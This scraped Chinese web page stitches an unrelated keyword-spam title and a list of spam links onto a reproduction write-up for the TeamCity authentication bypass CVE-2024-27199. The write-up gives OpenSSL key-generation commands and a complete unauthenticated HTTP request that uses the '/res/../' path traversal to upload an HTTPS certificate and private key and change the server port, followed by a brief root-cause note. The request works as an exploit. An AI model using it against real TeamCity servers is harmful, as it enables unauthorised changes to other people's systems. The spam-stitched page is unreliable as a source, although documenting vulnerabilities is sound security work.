当前位置: 首页 > news >正文

网站链接交换王烨简历

网站链接交换,王烨简历,网站的好坏,天津网站建设 熊掌号漏洞简介 TeamCity Web 服务器中发现了第二个身份验证绕过漏洞。这种身份验证旁路允许在没有身份验证的情况下访问有限数量的经过身份验证的端点。未经身份验证的攻击者可以利用此漏洞修改服务器上有限数量的系统设置#xff0c;并泄露服务器上有限数量的敏感信息。 项目官网…漏洞简介 TeamCity Web 服务器中发现了第二个身份验证绕过漏洞。这种身份验证旁路允许在没有身份验证的情况下访问有限数量的经过身份验证的端点。未经身份验证的攻击者可以利用此漏洞修改服务器上有限数量的系统设置并泄露服务器上有限数量的敏感信息。 项目官网下载地址Other Versions - TeamCity 参考链接 NVD - CVE-2024-27199CVE-2024-27198 and CVE-2024-27199: JetBrains TeamCity Multiple Authentication Bypass Vulnerabilities (FIXED) | Rapid7 Blog 影响版本 2023.11.4 漏洞复现 1服务信息泄露 2.HTTPS 证书上传 使用 OpenSSL 生成和处理 ECDSA 密钥对和证书 openssl ecparam -name prime256v1 -genkey -noout -out private-eckey.pem openssl ec -in private-eckey.pem -pubout -out public-key.pem openssl req -new -x509 -key private-eckey.pem -out cert.pem -days 360 openssl pkcs8 -topk8 -nocrypt -in private-eckey.pem -out hax.key 运行上面的命令生成如下文件 构造如下包上传HTTPS 证书并设定8443端口 POST /res/../app/https/settings/uploadCertificate HTTP/1.1 Host: 192.168.116.128:8111 Content-Type: multipart/form-data; boundary----WebKitFormBoundary4d5hF7eNFFbgJoAC Content-Length: 1576------WebKitFormBoundary4d5hF7eNFFbgJoAC Content-Disposition: form-data; namecertificate; filenamecert.pem Content-Type: application/octet-stream-----BEGIN CERTIFICATE----- MIICYjCCAgegAwIBAgIUFHRabDe2dTOHNe8at5fDfsigDJwwCgYIKoZIzj0EAwIw gYUxCzAJBgNVBAYTAmNuMQswCQYDVQQIDAJobjENMAsGA1UEBwwEbmFtZTEQMA4G A1UECgwHY29tcGFueTESMBAGA1UECwwJdW5pdCBuYW1lMRQwEgYDVQQDDAtjb21t b24tbmFtZTEeMBwGCSqGSIb3DQEJARYPYWRtaW5AYWRtaW4uY29tMB4XDTI0MDMx MTA3NTQwN1oXDTI1MDMwNjA3NTQwN1owgYUxCzAJBgNVBAYTAmNuMQswCQYDVQQI DAJobjENMAsGA1UEBwwEbmFtZTEQMA4GA1UECgwHY29tcGFueTESMBAGA1UECwwJ dW5pdCBuYW1lMRQwEgYDVQQDDAtjb21tb24tbmFtZTEeMBwGCSqGSIb3DQEJARYP YWRtaW5AYWRtaW4uY29tMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEMJ6RI0Xj dm72v2AjYl0SGBPAC/TqXHbdSyJSzqDmsH1Du/M8vlBkO1QYnNbcuiqnvEHnfea4 WlDf5a1XnSQBB6NTMFEwHQYDVR0OBBYEFIP5qYGpT7CujDvYGCNtsCiycOmdMB8G A1UdIwQYMBaAFIP5qYGpT7CujDvYGCNtsCiycOmdMA8GA1UdEwEB/wQFMAMBAf8w CgYIKoZIzj0EAwIDSQAwRgIhAMcfVmbn711/5hOhnryKro9XH5m77DK/vmBvR0mk SIYVAiEApXhoDMQiv/0NVbZrOyWc6oMSlg3CuKtAj6Sd5hxWR0 -----END CERTIFICATE-----------WebKitFormBoundary4d5hF7eNFFbgJoAC Content-Disposition: form-data; namekey; filenamehax.key Content-Type: application/octet-stream-----BEGIN PRIVATE KEY----- MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgflqLec/N8uvpqGUK Z7sGvs81dBDffRUwufigYq016ChRANCAAQwnpEjReN2bva/YCNiXRIYE8AL9Opc dt1LIlLOoOawfUO78zyUGQ7VBic1ty6Kqe8Qed95rhaUN/lrVedJAEH -----END PRIVATE KEY-----------WebKitFormBoundary4d5hF7eNFFbgJoAC Content-Disposition: form-data; nameport8443 ------WebKitFormBoundary4d5hF7eNFFbgJoAC-- 后台验证下证书是否上传 或者直接访问https://192.168.116.128:8443/ 漏洞分析 产生漏洞的原因是该系统采用了spring框架该框架在处理url时遇到url中的../会自行解析再次拼接这可能会产生某些某些判断机制绕过的现象。其中/res/下的路径不需要认证就可以被服务器去请求有如下定义 /app/https/settings/**有如下定义
http://www.pierceye.com/news/534728/

相关文章:

  • 网站技术制作流程图国内顶尖小程序开发公司
  • 免费网站建设下载优化关键词规则
  • 网站浮动窗口如何做自己怎么做淘宝客网站
  • 石材外贸在哪个网站做网页版 微信
  • 网站开发属于程序员吗sem 优化软件
  • 公司做网站是管理费用小程序官方文档
  • 公司网站推广技巧响水网站设计
  • 徐州本地网站wap页面是什么
  • 网站开发应用价值做套网站多少钱
  • asp.net网站模板免费下载怎么才能访问自己做的网站
  • 长沙企业网站制作宝安公司网站建设
  • 做网站需要拉多大的宽带dw做的网站怎么做后台
  • 公司网站建设设计公司哪家好wordpress自动封ip
  • 郫县网站制作wordpress搜索打钩
  • 哪些网站可以做招商广告语wordpress发文章的id怎么不连续
  • 家私网站栏目和功能需求策划网页样式库
  • 什么是网站网页主页企业电子邮箱格式
  • 金属建材企业网站建设方案用pycharm做网站
  • 重庆网站空间黄骅港一期码头潮汐表
  • 推广网站如何做做酒店网站所用到的算法
  • 最好的网站建设组织wordpress 删除google
  • 生物科技 网站模板下载在线室内设计
  • 网站兼容性问题线上设计师接单
  • 外包网站平台可以做电算化的网站
  • 教育网站设计案例学校网站设计
  • 网站建设入门教程pdf网络推广和seo
  • 闲鱼钓鱼网站怎么做百度网页版主页
  • 一次备案多个网站alexa排名查询
  • 郑州做招商的网站网站建设的流程推广方案
  • wordpress手机网站插件海口seo关键词优化